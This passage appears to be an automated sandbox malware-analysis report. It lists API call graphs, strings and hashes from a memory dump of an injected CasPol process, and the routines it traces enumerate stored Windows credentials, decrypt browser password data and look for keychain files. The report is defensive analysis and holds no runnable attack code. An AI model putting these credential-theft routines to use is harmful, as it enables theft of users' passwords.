40df23-40df4a GetCurrentProcess DuplicateHandle 379->381 380->378 382 40dfd1-40dfd3 380->382 381->380 383 40df4c-40df76 memset call 41352f 381->383 382->377 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0040DDAD
                                                                                                                    • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                  • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                                    • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                                  • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                  • CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                                  • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                  • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                  • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                                                                  • _wcsicmp.MSVCRT ref: 0040DED8
                                                                                                                  • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                                                                  • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                                                                  • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                                                                  • memset.MSVCRT ref: 0040DF5F
                                                                                                                  • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                                                                                  • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                                                                  • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                                                                  • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                                                                  • API String ID: 708747863-3398334509
                                                                                                                  • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                                  • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                                                                  • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                                  • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                    • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                                                    • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                                                                    • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                  • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                                                  • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                                                  • free.MSVCRT ref: 00418803
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1355100292-0
                                                                                                                  • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                                  • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                                                                  • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                                  • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                                                                  APIs
                                                                                                                  • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                                                  • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FileFind$FirstNext
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1690352074-0
                                                                                                                  • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                  • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                                                  • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                  • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0041898C
                                                                                                                  • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InfoSystemmemset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3558857096-0
                                                                                                                  • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                  • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                                                  • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                  • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 43 44558e-445594 call 444b06 4->43 44 44557e-44558c call 4136c0 call 41366b 4->44 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 46 445823-445826 14->46 15->16 21 445672-445683 call 40a889 call 403fbe 16->21 22 4455fb-445601 16->22 58 445879-44587c 18->58 23 44594f-445958 19->23 24 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->24 77 445685 21->77 78 4456b2-4456b5 call 40b1ab 21->78 30 445605-445607 22->30 31 445603 22->31 28 4459f2-4459fa 23->28 29 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 23->29 140 44592d-445945 call 40b6ef 24->140 141 44594a 24->141 38 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 28->38 39 445b29-445b32 28->39 145 4459d0-4459e8 call 40b6ef 29->145 146 4459ed 29->146 30->21 42 445609-44560d 30->42 31->30 182 445b08-445b15 call 40ae51 38->182 47 445c7c-445c85 39->47 48 445b38-445b96 memset * 3 39->48 42->21 56 44560f-445641 call 4087b3 call 40a889 call 4454bf 42->56 43->3 44->43 49 44584c-445854 call 40b1ab 46->49 50 445828 46->50 70 445d1c-445d25 47->70 71 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 47->71 63 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 48->63 64 445b98-445ba0 48->64 49->13 65 44582e-445847 call 40a9b5 call 4087b3 50->65 156 445665-445670 call 40b1ab 56->156 157 445643-445663 call 40a9b5 call 4087b3 56->157 61 4458a2-4458aa call 40b1ab 58->61 62 44587e 58->62 61->19 75 445884-44589d call 40a9b5 call 4087b3 62->75 249 445c77 63->249 64->63 76 445ba2-445bcf call 4099c6 call 445403 call 445389 64->76 143 445849 65->143 82 445fae-445fb2 70->82 83 445d2b-445d3b 70->83 160 445cf5 71->160 161 445cfc-445d03 71->161 148 44589f 75->148 76->47 93 44568b-4456a4 call 40a9b5 call 4087b3 77->93 109 4456ba-4456c4 78->109 98 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 83->98 99 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 83->99 150 4456a9-4456b0 93->150 166 445d67-445d6c 98->166 167 445d71-445d83 call 445093 98->167 196 445e17 99->196 197 445e1e-445e25 99->197 122 4457f9 109->122 123 4456ca-4456d3 call 413cfa call 413d4c 109->123 122->6 174 4456d8-4456f7 call 40b2cc call 413fa6 123->174 140->141 141->23 143->49 145->146 146->28 148->61 150->78 150->93 156->109 157->156 160->161 171 445d05-445d13 161->171 172 445d17 161->172 176 445fa1-445fa9 call 40b6ef 166->176 167->82 171->172 172->70 207 4456fd-445796 memset * 4 call 409c70 * 3 174->207 208 4457ea-4457f7 call 413d29 174->208 176->82 202 445b17-445b27 call 40aebe 182->202 203 445aa3-445ab0 call 40add4 182->203 196->197 198 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->198 199 445e6b-445e7e call 445093 197->199 239 445e62-445e69 198->239 240 445e5b 198->240 220 445f67-445f99 call 40b2cc call 409d1f call 409b98 199->220 202->39 203->182 221 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 203->221 207->208 248 445798-4457ca call 40b2cc call 409d1f call 409b98 207->248 208->10 220->82 253 445f9b 220->253 221->182 239->199 245 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 239->245 240->239 265 445f4d-445f5a call 40ae51 245->265 248->208 264 4457cc-4457e5 call 4087b3 248->264 249->47 253->176 264->208 269 445ef7-445f04 call 40add4 265->269 270 445f5c-445f62 call 40aebe 265->270 269->265 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->220 274->265 281 445f3a-445f48 call 445093 274->281 281->265
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 004455C2
                                                                                                                  • wcsrchr.MSVCRT ref: 004455DA
                                                                                                                  • memset.MSVCRT ref: 0044570D
                                                                                                                  • memset.MSVCRT ref: 00445725
                                                                                                                    • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                                                    • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                                                    • Part of subcall function 0040BDB0: CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                                    • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                                                    • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                                                                    • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                                                    • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                                    • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                                  • memset.MSVCRT ref: 0044573D
                                                                                                                  • memset.MSVCRT ref: 00445755
                                                                                                                  • memset.MSVCRT ref: 004458CB
                                                                                                                  • memset.MSVCRT ref: 004458E3
                                                                                                                  • memset.MSVCRT ref: 0044596E
                                                                                                                  • memset.MSVCRT ref: 00445A10
                                                                                                                  • memset.MSVCRT ref: 00445A28
                                                                                                                  • memset.MSVCRT ref: 00445AC6
                                                                                                                    • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                    • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                                                    • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                                                    • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                    • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                                  • memset.MSVCRT ref: 00445B52
                                                                                                                  • memset.MSVCRT ref: 00445B6A
                                                                                                                  • memset.MSVCRT ref: 00445C9B
                                                                                                                  • memset.MSVCRT ref: 00445CB3
                                                                                                                  • _wcsicmp.MSVCRT ref: 00445D56
                                                                                                                  • memset.MSVCRT ref: 00445B82
                                                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                    • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                    • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                    • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                                                    • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                                                  • memset.MSVCRT ref: 00445986
                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                                                                  • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                                                  • API String ID: 2263259095-3798722523
                                                                                                                  • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                                                  • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                                                  • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                                                  • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                    • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                    • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                    • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                  • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                                                                  • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                                                  • String ID: $/deleteregkey$/savelangfile
                                                                                                                  • API String ID: 2744995895-28296030
                                                                                                                  • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                  • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                                                  • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                  • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0040B71C
                                                                                                                    • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                                                    • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                                                  • wcsrchr.MSVCRT ref: 0040B738
                                                                                                                  • memset.MSVCRT ref: 0040B756
                                                                                                                  • memset.MSVCRT ref: 0040B7F5
                                                                                                                  • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                  • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                                                                                                  • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                                                                  • memset.MSVCRT ref: 0040B851
                                                                                                                  • memset.MSVCRT ref: 0040B8CA
                                                                                                                  • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                                                                                                    • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                    • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                                                                                                  • memset.MSVCRT ref: 0040BB53
                                                                                                                  • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                                                                  • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$File$Freewcsrchr$AddressCloseCopyCreateDeleteHandleLibraryLocalProcmemcmpmemcpywcscpy
                                                                                                                  • String ID: chp$v10
                                                                                                                  • API String ID: 4165125987-2783969131
                                                                                                                  • Opcode ID: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                                                                                  • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                                                  • Opcode Fuzzy Hash: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                                                                                  • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 504 4091b8-40921b memset call 40a6e6 call 444432 509 409520-409526 504->509 510 409221-40923b call 40b273 call 438552 504->510 514 409240-409248 510->514 515 409383-4093ab call 40b273 call 438552 514->515 516 40924e-409258 call 4251c4 514->516 528 4093b1 515->528 529 4094ff-40950b call 443d90 515->529 521 40937b-40937e call 424f26 516->521 522 40925e-409291 call 4253cf * 2 call 4253af * 2 516->522 521->515 522->521 552 409297-409299 522->552 532 4093d3-4093dd call 4251c4 528->532 529->509 538 40950d-409511 529->538 539 4093b3-4093cc call 4253cf * 2 532->539 540 4093df 532->540 538->509 542 409513-40951d call 408f2f 538->542 539->532 555 4093ce-4093d1 539->555 543 4094f7-4094fa call 424f26 540->543 542->509 543->529 552->521 554 40929f-4092a3 552->554 554->521 556 4092a9-4092ba 554->556 555->532 557 4093e4-4093fb call 4253af * 2 555->557 558 4092bc 556->558 559 4092be-4092e3 memcpy memcmp 556->559 557->543 569 409401-409403 557->569 558->559 560 409333-409345 memcmp 559->560 561 4092e5-4092ec 559->561 560->521 564 409347-40935f memcpy 560->564 561->521 563 4092f2-409331 memcpy * 2 561->563 566 409363-409378 memcpy 563->566 564->566 566->521 569->543 570 409409-40941b memcmp 569->570 570->543 571 409421-409433 memcmp 570->571 572 4094a4-4094b6 memcmp 571->572 573 409435-40943c 571->573 572->543 575 4094b8-4094ed memcpy * 2 572->575 573->543 574 409442-4094a2 memcpy * 3 573->574 576 4094f4 574->576 575->576 576->543
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 004091E2
                                                                                                                    • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                  • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                  • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                                  • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                                                                  • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                                                                  • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                                                                                                  • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                                                                  • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                                                                  • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                                                                                                  • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                                                                                                  • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                                                                  • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                                                                  • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                                                                  • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                                                                                                  • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                                                                  • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3715365532-3916222277
                                                                                                                  • Opcode ID: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                                                                                  • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                                                  • Opcode Fuzzy Hash: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                                                                                  • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 577 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 580 413f00-413f11 Process32NextW 577->580 581 413da5-413ded OpenProcess 580->581 582 413f17-413f24 CloseHandle 580->582 583 413eb0-413eb5 581->583 584 413df3-413e26 memset call 413f27 581->584 583->580 585 413eb7-413ebd 583->585 592 413e79-413e9d call 413959 call 413ca4 584->592 593 413e28-413e35 584->593 587 413ec8-413eda call 4099f4 585->587 588 413ebf-413ec6 free 585->588 590 413edb-413ee2 587->590 588->590 598 413ee4 590->598 599 413ee7-413efe 590->599 604 413ea2-413eae CloseHandle 592->604 596 413e61-413e68 593->596 597 413e37-413e44 GetModuleHandleW 593->597 596->592 600 413e6a-413e76 596->600 597->596 602 413e46-413e5c GetProcAddress 597->602 598->599 599->580 600->592 602->596 604->583
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
                                                                                                                  • memset.MSVCRT ref: 00413D7F
                                                                                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                                                  • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                                                  • memset.MSVCRT ref: 00413E07
                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                                                  • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                                                                                  • free.MSVCRT ref: 00413EC1
                                                                                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                                                                                  • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                                  • API String ID: 1344430650-1740548384
                                                                                                                  • Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                                                                  • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                                                  • Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                                                                  • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
